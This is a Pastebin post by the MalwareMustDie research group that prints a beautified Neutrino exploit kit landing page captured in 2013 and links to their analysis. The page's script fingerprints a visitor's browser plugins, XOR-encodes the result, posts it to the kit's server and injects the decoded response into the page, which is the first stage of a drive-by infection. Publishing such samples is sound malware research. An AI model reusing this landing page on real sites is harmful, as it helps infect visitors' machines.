MalwareMustDie

#MalwareMustDie -Neutrino EK Landing Page Beautified

Jun 25th, 2013
756
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // #MalwareMustDie!
  2. // Neutrino EK Landing Page Beutified - Where the infection starts!
  3. // Analysis: http://malwaremustdie.blogspot.jp/2013/06/knockin-on-neutrino-exploit-kits-door.html
  4.  
  5. !DOCTYPE HTML>
  6.  <html>
  7.  <head>
  8.  <link href='rcijxziqjmwai.css' rel='stylesheet'
  9.  <link href='ubjabj.css' rel='stylesheet'
  10.  <link href='wqhbu.css' rel='stylesheet'
  11.  <link href='rwkjnnswkreab.css' rel='stylesheet'
  12.  
  13.  <script src='wgyesrof.js'></script>
  14.  <script src='vuofg.js'></script>
  15.  <script src='cqqv.js'></script>
  16.  <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
  17.  <link href='czdwbmxdwzzmgbh.css' rel='stylesheet'
  18.  <link href='sejcrxuoimtjnlhp.css' rel='stylesheet'
  19.  <link href='kmmxjptip.css' rel='stylesheet'
  20.  <link href='pqnojry.css' rel='stylesheet'
  21.  <script src='cnvpce.js'></script>
  22.  <script src='aqrwwpb.js'></script>
  23.  <script src='hptkkoyqvzt.js'
  24.  </script><script src='ppkuryqha.js'></script>
  25.  <script type="text/javascript" src="scripts/js/plg.js"></script>
  26.  <script src='blgxhwyvdop.js'></script>
  27.  <script src='zenpzmilbxv.js'></script>
  28.  <script src='oumvvhkwsruznt.js'></script>
  29.  <script src='rhkggotwoffagc.js'></script>
  30.  
  31.  <script type="text/javascript"
  32.  $(document).ready(function()
  33.  {
  34.    var aa = 'gvwuhd';
  35.    var bb = '';
  36.    var cc = aa;
  37.    bb = cc;
  38.    \u0410\u041d602(
  39.    '51c81ff4aaa2cce42c1809bd',
  40.    bb,
  41.    'bxfkxhcqk',
  42.    'rruqytkegrvjt',
  43.    'eefazbuhfeekpb'
  44.    );
  45.  }
  46.  );
  47.  function \u0410\u041d602(a,c,d,b,e)
  48.  {
  49.    a=
  50.    {
  51.      plugins:
  52.      {
  53.        adobe_reader:PluginDetect.getVersion("AdobeReader"),
  54.        java:PluginDetect.getVersion("Java"),
  55.        flash:PluginDetect.getVersion("Flash"),
  56.        quick_time:PluginDetect.getVersion("QuickTime"),
  57.        real_player:PluginDetect.getVersion("RealPlayer"),
  58.        shockwave:PluginDetect.getVersion("Shockwave"),
  59.        silver_light:PluginDetect.getVersion("Silverlight"),
  60.        vlc:PluginDetect.getVersion("VLC"),
  61.        wmp:PluginDetect.getVersion("WMP")
  62.      }
  63.      ,hid:a
  64.    };
  65.    var f=
  66.    {
  67.    };
  68.    f[b]=c;
  69.    f[e]=encodeURIComponent(xor(JSON.stringify(a),c));
  70.    $.post(d,f,function(a)
  71.    {
  72.      $("body").append(xor(decodeURIComponent(a),c))
  73.    }
  74.    )
  75.  }
  76.  function xor(a,c)
  77.  {
  78.    for(var d="",b=0,e=0,b=0;b<a.length;b++)e=Math.floor(b%c.length),d+=String.fromCharCode(a.charCodeAt(b)^c.charCodeAt(e));
  79.    return d
  80.  }
  81.  JSON.stringify=JSON.stringify||function(a)
  82.  {
  83.    var c=typeof a;
  84.    if("object"!=c||null===a)return"string"==c&&(a='"'+a+'"'),String(a);
  85.    var d,b,e=[],f=a&&a.constructor==Array;
  86.    for(d in a)b=a[d],c=typeof b,"string"==c?b='"'+b+'"':"object"==c&&null!==b&&(b=JSON.stringify(b)),e.push((f?"":'"'+d+'":')+String(b));
  87.  return(f?"[":"{")+String(e)+(f?"]":"}")
  88.  };
  89.  </script>
  90.  </head>
  91.  <body>
  92.  <img src='rqpnl.png'><img src='ioqcnevjvdtckivg.png'><img src='lxio.png'><img src='fkatvwsdk.gif'
  93.  <img src='mbhiebkokgvhhgfp.png'><img src='aajauexmihvoghpo.jpg'
  94.  </body>
  95.  </html>
  96.  
  97. ---
  98. "We wacked you good - Neutrino moronz.
  99. #MalwareMustDie! @unixfreaxjp ~]# date
  100. Tue Jun 25 20:31:03 JST 2013
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×